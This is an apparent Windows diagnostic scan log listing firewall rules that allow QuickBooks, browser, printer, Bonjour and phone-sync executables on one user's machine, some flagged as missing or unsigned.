FirewallRules: [{D1FEA7C0-2F71-4FB3-8AC0-9E501D6D3392}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{626F6D5D-1B51-49F6-B3E1-C3EF74D89716}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{BF1C6A90-6997-4E91-A77F-D3C9A0491949}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{1C0A75C3-4E99-4423-AF58-1BAD3EC7E1BD}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{876D85F5-FB04-4898-AE0E-3477F2A91226}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{44728EEF-B903-458D-890A-3B87565A219D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{BF72D947-D5B4-4E3B-ACB0-DFA2B4059265}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{FD6C4D5A-706A-4354-AF3F-9A17C1CA19BA}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{A70EA588-2E8A-4A54-8995-0E67C4E8B890}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{6BDD2D4F-2FEA-4674-AA7C-D93E37747B47}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{77E231DC-1714-44DF-8A01-2356BDE3D4CF}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{23F6F1D3-795A-4159-BF15-5B61EA379D80}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{12D2DBAA-7D06-4817-AF82-3CC76A2D4E3D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{081D37B6-F832-4402-B33D-4895B0BCC058}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{1E3D0ED9-2488-416B-9700-00E226A7E75D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{0ED3CCFC-7780-4352-A1DF-5FBAD2D978EE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{43797571-0CC2-4634-8BC0-85DB408B0418}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{615C1A0A-96FB-4C74-BCBA-86EFBC622E18}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{20C04246-5172-4363-8699-1F26286E6041}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{8043F567-30EF-400A-B54B-5D7A18D763DF}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{2C6BA645-DEA8-4712-8857-38C8C87ACBB0}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{646858E5-CC81-46EA-9ED8-327C67D5A156}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{6576A075-4A15-427B-BFDB-FDD9C81BD8F3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{699FF3A0-AFE5-4699-962D-887C5D83220F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{8319D26D-ACAF-4963-B5EF-3D9F6FF806AC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{863B10AA-9602-44F0-BA7E-4D4D5131321E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{71E3E8C8-CA44-4F98-97B7-B9877CBF53E9}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{429A889C-0B5B-4182-A29C-A382206DBCF8}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{0528EC95-42AE-4ADE-9D38-32D3AB440CA1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{78877C15-57BB-4D03-BCAE-C17BC8129371}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{0F88E81D-D7EF-4DD3-9007-C179D5DF8C39}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{CCBCA3FB-97DC-4117-B569-2BAB09168B3E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{65B85E1B-000F-42AD-95B1-017E937EFA6C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{A45EA53D-DADA-4A56-87B0-5CE5855051C3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{FAD60949-7922-40C0-97AA-FB94FBF3D071}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{A31C6E55-438E-4B6E-A6CF-3A5B1A4DC6ED}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{389679E2-7102-499D-BB20-D76F24F9C540}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{12622E24-029E-4787-BBCA-923FA114E638}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{78C47D12-661A-496E-B1B2-661F8A742FDE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{10CA210E-1A43-4BA5-AEDB-509F30784DA1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{19368A2E-60A6-463E-8666-5D181EFBF7E6}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{1CED85CB-CFEE-4105-9C7B-EF0533A71EBD}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{218BF52B-4827-4512-8A66-1D11104D9BDA}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [UDP Query
User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File
FirewallRules: [TCP Query
User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File
FirewallRules: [UDP Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [{E99B5E50-C7F4-44D5-9F28-A7F035E0C62C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{1C1FD5D7-33BC-4E2B-9D85-8A0FE95F8D9F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{69D7DCA6-F14F-4DD9-AA64-D69B0BF38505}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{CC276B70-DD3C-4CB8-90D7-5569B20E6509}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{D741D2FE-5DE1-474A-9E0F-0A02ECF2C2F1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{9489BDD3-8E23-4FAB-A47E-BEF81671CAD9}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{E5CD524F-9C81-4A9D-A4D9-8CF889FFE043}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{CDC6B450-C68A-4FE1-935F-BBE92C8454E0}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{99456CC4-A3F3-4A44-8E60-CBC628D0166F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{D2C4B9D4-8A0C-497B-8B8D-139BEE93900E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{67B6936A-3C79-4780-82EE-020C22C15BE0}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{57C57EC3-2B17-4174-9433-99ED6C3EFCDB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{EC6F2F44-822E-4A60-B213-373D2674A2C3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{F227BD39-004F-4462-870B-E42CF36BCD14}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{7B4516EA-BB5E-4C32-B48D-CB77E63618CA}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{4F8AACE6-6D87-4BB4-BB8E-CD30BC1B8D5F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{E971AD64-E5A9-49C1-9BEC-B99BAE189C37}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{92AE2D3E-E88C-4937-B205-0510D86E3D98}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{9ED98AE6-C258-4291-BD27-0A12A845730A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{416DA705-1481-44D1-8447-134E1B33B4B6}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{0E8F11B5-A602-441F-8C42-5160B17B3EC1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{A7FD22C0-B14C-4500-8F68-37E89E9708A7}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{5127C40F-B3B1-4AEB-B51D-1C467861FCEF}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{8E77DFE2-0FA2-46E2-A6F3-662963CF817A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{DC1C79DE-5A0D-423D-A2F2-E9B0A03C272C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{6E0E5323-9ED0-4E3F-9330-B17AC2E12E9F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{D933AD83-2193-42E9-8354-93FDE931392B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{61F7EE2E-8CF2-46C1-BEC7-C7E5B6A0036C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{BDE5709E-2C91-46F5-BBE7-D689AFA5DCB9}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{7FFBFD8C-66DE-4384-B916-6E628CB5D496}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{3CFDD59B-0936-43FF-8DFD-6CAB1B2E36BA}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{B8F74F0C-ED26-4C72-86D2-EBB84DE0AF65}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{2D768E31-046F-4A08-A37A-9CAB290FFC21}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{D8AE7796-1B51-4B64-B925-74050971C0CD}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{DEF6D290-666D-4A4D-920F-177E401B2999}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{C3B4D040-2F75-4FED-B5B1-957E0B296E1F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{B4AE9E32-6B19-4D67-AE4F-157DA75CF665}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{A49DD402-7CD6-4AC9-9803-633C9517CC53}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{D3F93373-8075-4037-91CD-B5736E6E19B1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{97ABF5D4-D8A4-4ECA-9652-3F0416AFE818}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{95337D2C-5983-416C-9B6A-E1CAF5FDF5EB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{697F7D0F-5121-4DA5-961D-35A9B31B2B57}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{4A014D40-67FE-4617-A95E-4C24FD6253BF}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{9DBDC61E-0DCE-42D3-9AFD-C096CC857362}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{6A877992-D071-4AD6-9D78-A08EB2632366}] => (Allow) C:\Program
Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe (LENOVO -> Lenovo)
FirewallRules: [TCP Query User{1B8A334E-EEC2-4581-BB3F-2919E383027A}C:\program
files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files
(x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{0476BAAC-75C4-4014-90F9-50571E1AC0F2}C:\program
files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files
(x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query
User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File
FirewallRules: [UDP Query
User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File
FirewallRules: [TCP Query User{478564DF-A83E-4790-87F7-2E664BE02F76}C:\program
files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files
(x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed]
FirewallRules: [UDP Query User{7F07EDCD-952B-46D9-8342-28B6DCDA5B19}C:\program
files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files
(x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed]
FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program
files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program
files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [TCP Query
User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File
FirewallRules: [UDP Query
User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File
FirewallRules: [TCP Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [UDP Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program
files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla
firefox\firefox.exe => No File
FirewallRules: [UDP Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program
files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla
firefox\firefox.exe => No File
FirewallRules: [TCP Query User{46351ECE-D982-4119-9C3F-4F3ED6562B2C}C:\program
files (x86)\mobikin\mobikin assistant for
android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files
(x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe
(UUMART LIMITED -> AndroidAssistServer)
FirewallRules: [UDP Query User{92651D82-4586-4B4A-B74D-AA81D19EB8B0}C:\program
files (x86)\mobikin\mobikin assistant for
android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files
(x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe
(UUMART LIMITED -> AndroidAssistServer)
FirewallRules: [{071B0A52-8B44-49BE-B1E4-DF2303FB6AA2}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions
20.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed]
FirewallRules: [{4CB537D6-B8F5-4F4B-A383-B1945B2968C6}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\CefSharp.BrowserSubprocess.exe (The CefSharp
Authors) [File not signed]
FirewallRules: [{BF37BEE1-8258-4375-9D33-9C5448918398}] => (Allow) C:\Program
Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4BA78CBA-00B7-4B46-BFD3-722654F7DC0E}] => (Allow) C:\Program
Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1D6FC334-0851-4A98-998A-796195624340}] => (Allow) C:\Program
Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9E10CCC6-1395-40F9-A98D-F795575840BE}] => (Allow) C:\Program
Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{66829F8A-35CD-4CFF-AC3C-906FADDF9ED6}C:\program
files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files
(x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed]
FirewallRules: [UDP Query User{56D8939D-263A-4635-B4F0-261D1A10796F}C:\program
files (x86)\brother\brmfl12d\faxrx.exe] => (Allow) C:\program files
(x86)\brother\brmfl12d\faxrx.exe (Brother Industries, Ltd.) [File not signed]
FirewallRules: [{0B7F57C4-3E61-42AB-B279-CD83D626ED89}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\CefSharp.BrowserSubprocess.exe (The CefSharp
Authors) [File not signed]
FirewallRules: [{E2DA926F-29EA-4B2F-A29B-DCF7ACC8B68D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions
20.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed]
FirewallRules: [{EAC396DF-7539-4AA6-BB14-F241204CC0A8}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\CefSharp.BrowserSubprocess.exe (The CefSharp
Authors) [File not signed]
FirewallRules: [{92C1B03D-8473-40B1-940F-DE34B8C3F4E8}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\CefSharp.BrowserSubprocess.exe (The CefSharp
Authors) [File not signed]
FirewallRules: [{8065ACAA-FFC0-4D86-AB31-2F938DDAF7DB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions
21.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed]
FirewallRules: [{90F85476-7FF7-4668-9784-5AB7CBD9A438}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{6366B856-CEFC-43EC-BE3A-38498D760ADE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{5AF0734B-F7B4-4304-878C-718444874B86}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{45F609D2-9C7A-4DE5-B502-61CF8405BE74}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{353F945B-F491-4B7B-9811-4C1370BDBD18}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{393FD0DB-504C-410E-B7A2-52E009DFEE59}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{BD988951-1E16-4B02-80C6-B3D20E1F5EA4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{1813103F-3CE9-4485-AFB6-319EC756F853}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{94A7F822-F83B-4738-A7AD-C45305090C9B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{81360C52-0920-4E77-8F84-7ED6C48032BE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{A2E36B23-B416-4400-B5C1-676BF5357ED3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{AC5E946B-CF83-4E8B-BC81-1E8D59764146}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{9A8A86FA-1274-4448-BABD-EED5A3343A68}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{039E41D9-4C9D-4AF6-AFF7-3C6E72D454A3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{FFDB9DA3-5085-446D-85D2-3D78331DA4E4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{682DF444-63DB-4D18-8025-644B363C71BB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{E431620E-6269-42E9-BE7D-7765F18DE413}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{BAA5C529-E7E2-40AE-8A64-72F1B011252F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{D31CF02C-E1AE-4738-B11D-3497652420AD}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{31A6337C-EB3F-428F-8121-5689F5B86715}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
